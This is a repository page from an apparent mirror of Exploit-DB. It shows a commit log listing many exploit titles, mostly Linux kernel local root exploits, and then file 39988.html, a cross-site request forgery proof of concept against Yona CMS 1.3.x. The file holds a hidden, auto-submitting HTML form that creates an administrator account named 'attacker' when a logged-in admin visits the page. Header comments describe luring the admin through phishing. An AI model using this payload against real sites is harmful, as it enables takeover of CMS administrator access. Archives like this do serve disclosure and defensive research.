bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/39988.html
Offensive Security 0fe9b46f79 DB: 2016-06-22 
14 new exploits

Linux Kernel <= 2.4.22 - 'do_brk' Local Root Exploit (2)
Linux Kernel <= 2.4.22 - 'do_brk()' Local Root Exploit (2)
Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap' Local Proof of Concept (1)
Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap' Local Proof of Concept (2)
Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Local Proof of Concept (1)
Linux Kernel <= 2.4.23 / <= 2.6.0 - 'do_mremap()' Local Proof of Concept (2)

Linux Kernel <= 2.4.23 / <= 2.6.0 - 'mremap()' Bound Checking Root Exploit
Linux Kernel <= 2.4.23 / <= 2.6.0 - 'mremap()' Bound Checking Root Exploit (3)

Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Missing 'do_munmap' Exploit
Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Missing 'do_munmap' Exploit (1)

Linux Kernel <= 2.4.29-rc2 - uselib() Privilege Elevation
Linux Kernel <= 2.4.29-rc2 - 'uselib()' Privilege Elevation (1)

Linux Kernel 2.4 - uselib() Privilege Elevation Exploit
Linux Kernel 2.4 - uselib() Privilege Elevation Exploit (2)

Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit
Linux Kernel 2.4.x / 2.6.x - uselib() Local Privilege Escalation Exploit (3)
Linux Kernel 2.6.17 <= 2.6.24.1 - vmsplice Local Root Exploit
Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit
Linux Kernel 2.6.17 <= 2.6.24.1 - 'vmsplice' Local Root Exploit (2)
Linux Kernel 2.6.23 <= 2.6.24 - vmsplice Local Root Exploit (1)

Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit (1)

Linux Kernel 2.6 UDEV < 141 (Gentoo / Ubuntu 8.10/9.04) - Local Privilege Escalation Exploit
Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) - UDEV < 141 Local Privilege Escalation Exploit (2)
Linux Kernel 2.x (Redhat) - sock_sendpage() Ring0 Local Root Exploit (1)
Linux Kernel 2.x - sock_sendpage() Local Root Exploit (2)
Linux Kernel 2.x (Redhat) - 'sock_sendpage()' Ring0 Local Root Exploit (1)
Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (2)

Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - sock_sendpage() ring0 Root Exploit (1)
Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (3)

Linux Kernel <= 2.6.30 - atalk_getname() 8-bytes Stack Disclosure Exploit
Linux Kernel <= 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure Exploit (1)
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit
Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit (1)
Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit (2)
Linux Kernel < 2.6.19 (x86/x64) - udp_sendmsg Local Root Exploit
Linux Kernel < 2.6.19 (Debian 4) - udp_sendmsg Local Root Exploit
Linux Kernel < 2.6.19 (x86/x64) - udp_sendmsg Local Root Exploit (2)
Linux Kernel < 2.6.19 (Debian 4) - 'udp_sendmsg' Local Root Exploit (3)

Linux Kernel 2.4 / 2.6 (Fedora 11) - sock_sendpage() Local Root Exploit (2)
Linux Kernel 2.4 / 2.6 (Fedora 11) - 'sock_sendpage()' Local Root Exploit (4)

Linux Kernel 2.4 / 2.6 - sock_sendpage() Local Root Exploit (3)
Linux Kernel 2.4 / 2.6 - 'sock_sendpage()' Local Root Exploit (5)

Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation
Linux Kernel 2.4.1-2.4.37 / 2.6.1-2.6.32-rc5 - Pipe.c Privilege Escalation (3)

Linux Kernel <= 2.6.32 - 'pipe.c' Local Privilege Escalation Vulnerability
Linux Kernel <= 2.6.32 - 'pipe.c' Local Privilege Escalation Vulnerability (4)

Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full Nelson' Local Privilege Escalation
Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation

Linux Kernel <= 2.6.37 - Local Kernel Denial of Service
Linux Kernel <= 2.6.37 - Local Kernel Denial of Service (1)

Linux Kernel < 2.6.37-rc2 - TCP_MAXSEG Kernel Panic DoS
Linux Kernel < 2.6.37-rc2 - TCP_MAXSEG Kernel Panic DoS (2)

Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - Econet Privilege Escalation Exploit
Linux Kernel < 2.6.36.2 (Ubuntu 10.04) - 'Half-Nelson.c' Econet Privilege Escalation Exploit

Linux Kernel 2.6.39 <= 3.2.2 (Gentoo / Ubuntu x86/x64) - Mempodipper Local Root (1)
Linux Kernel 2.6.39 <= 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper.c' Local Root (1)

Linux Kernel 2.0/2.1_ Digital UNIX <= 4.0 D_ FreeBSD <= 2.2.4_ HP HP-UX 10.20/11.0_ IBM AIX <= 3.2.5_ NetBSD 1.2_ Solaris <= 2.5.1 - Smurf Denial of Service Vulnerability
Linux Kernel 2.0/2.1 (Digital UNIX <= 4.0 D / FreeBSD <= 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX <= 3.2.5 / NetBSD 1.2 / Solaris <= 2.5.1) - Smurf Denial of Service Vulnerability

Linux Kernel <= 2.3_ BSD/OS <= 4.0_ FreeBSD <= 3.2_ NetBSD <= 1.4 - Shared Memory Denial of Service Vulnerability
Linux Kernel <= 2.3 (BSD/OS <= 4.0 / FreeBSD <= 3.2 / NetBSD <= 1.4) - Shared Memory Denial of Service Vulnerability

Linux Kernel 2.2.12/2.2.14/2.3.99_ RedHat 6.x - Socket Denial of Service
Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service
Linux Kernel 2.2.x/2.4.0-test1_ SGI ProPack 1.2/1.3 - Capabilities Local Root (sendmail) Vulnerability (1)
Linux Kernel 2.2.x/2.4.0-test1_ SGI ProPack 1.2/1.3 - Capabilities Local Root (sendmail <= 8.10.1) Vulnerability (2)
Linux Kernel 2.2.x <= 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Local Root 'sendmail' Vulnerability (1)
Linux Kernel 2.2.x <= 2.4.0-test1 (SGI ProPack 1.2/1.3) - Capabilities Local Root (sendmail <= 8.10.1) Vulnerability (2)

Linux Kernel < 3.3.x - 3.7.x (Arch Linux x86_64) - sock_diag_handlers[] Local Root
Linux Kernel < 3.3.x - 3.7.x (Arch Linux x86_64) - 'sock_diag_handlers[]' Local Root (1)

Linux Kernel <= 3.7.10 (Ubuntu 12.10 x64) - sock_diag_handlers Local Root Exploit
Linux Kernel <= 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Local Root Exploit (2)

Linux Kernel 2.6.x - SYS_EPoll_Wait Local Integer Overflow Local Root Vulnerability (1)
Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow Local Root Vulnerability (1)

Linux Kernel 2.6.32 <= 3.x.x (CentOS) - PERF_EVENTS Local Root Exploit
Linux Kernel 2.6.32 <= 3.x.x (CentOS) - 'PERF_EVENTS' Local Root Exploit (1)

Linux Kernel < 3.8.9 (x86_64) - perf_swevent_init Local Root Exploit
Linux Kernel < 3.8.9 (x86_64) - perf_swevent_init Local Root Exploit (2)

Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat - Proof of Concept
Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat - Proof of Concept (1)
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - Arbitrary Write with CONFIG_X86_X32 Exploit
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Local Root Exploit
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - Arbitrary Write with 'CONFIG_X86_X32' Exploit (2)
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Local Root Exploit (3)

Linux Kernel 2.6.x - 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty

Linux Kernel 3.3 < 3.8 (Ubuntu/Fedora 18) - SOCK_DIAG Local Root Exploit
Linux Kernel 3.3 < 3.8 (Ubuntu/Fedora 18) - SOCK_DIAG Local Root Exploit (3)
Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04.(0_1_2) x64) - perf_swevent_init Local Root Exploit
Linux Kernel 2.6.x - 'fasync_helper()' Local Privilege Escalation Vulnerability
Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04.0/1/2 x64) - perf_swevent_init Local Root Exploit (3)
Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation Vulnerability

Linux Kernel 2.6.39 <= 3.2.2 (x86/x64) - Mempodipper Local Root (2)
Linux Kernel 2.6.39 <= 3.2.2 (x86/x64) - 'Mempodipper.c' Local Root (2)

Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Local Root Shell
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Root Shell

Linux Kernel <= 4.3.3 (Ubuntu 14.04/15.10) - overlayfs Local Root Exploit
Linux Kernel <= 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Root Exploit (1)

Linux Kernel <= 4.3.3 - overlayfs Local Privilege Escalation
Linux Kernel <= 4.3.3 - 'overlayfs' Local Privilege Escalation (2)
DarkComet Server Remote File Download Exploit (msf)
Banshee 2.6.2 - .mp3 Crash PoC
IonizeCMS 1.0.8 - (Add Admin) CSRF
Yona CMS - (Add Admin) CSRF
Joomla Publisher Pro (com_publisher) Component - SQL Injection
Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074)
Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074)
Linux - ecryptfs and /proc/$pid/environ Privilege Escalation
Windows - Custom Font Disable Policy Bypass
Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063)
SAP NetWeaver AS JAVA 7.1 - 7.5 - ctcprotocol Servlet XXE
SAP NetWeaver AS JAVA 7.1 - 7.5 - Directory Traversal
Radiant CMS 1.1.3 - Mutiple Persistent XSS Vulnerabilities
YetiForce CRM < 3.1 - Persistent XSS
2016-06-22 05:06:31 +00:00

34 lines
No EOL
1.2 KiB
HTML
Executable file
Raw Blame History

<!--
# Exploit Title: Yona CMS <= 1.3.x Remote Admin Add CSRF Exploit
# Exploit Author: s0nk3y
# Google Dork: -
# Date: 21/06/2016
# Vendor Homepage: http://yonacms.com
# Software Link: https://github.com/oleksandr-torosh/yona-cms/
# Version: 1.3.x
# Tested on: Ubuntu 16.04
Yona CMS is vulnerable to CSRF attack (No CSRF token in place) meaning
that if an admin user can be tricked to visit a crafted URL created by
attacker (via spear phishing/social engineering), a form will be submitted
to (http://localhost/admin/admin-user/add) that will add a
new user as administrator.
Once exploited, the attacker can login to the admin panel (
http://localhost/admin)
using the username and the password he posted in the form.
CSRF PoC Code
=============
-->
<form method="post" action="http://localhost/admin/admin-user/add">
<input type="hidden" name="login" value="attacker"/>
<input type="hidden" name="email" value="attacker@email.com"/>
<input type="hidden" name="name" value="attacker"/>
<input type="hidden" name="role" value="admin"/>
<input type="hidden" name="password" value="attackerPassword"/>
<input type="hidden" name="active"/>
</form>
<script>
document.forms[0].submit();
</script>
Reference in a new issue View git blame Copy permalink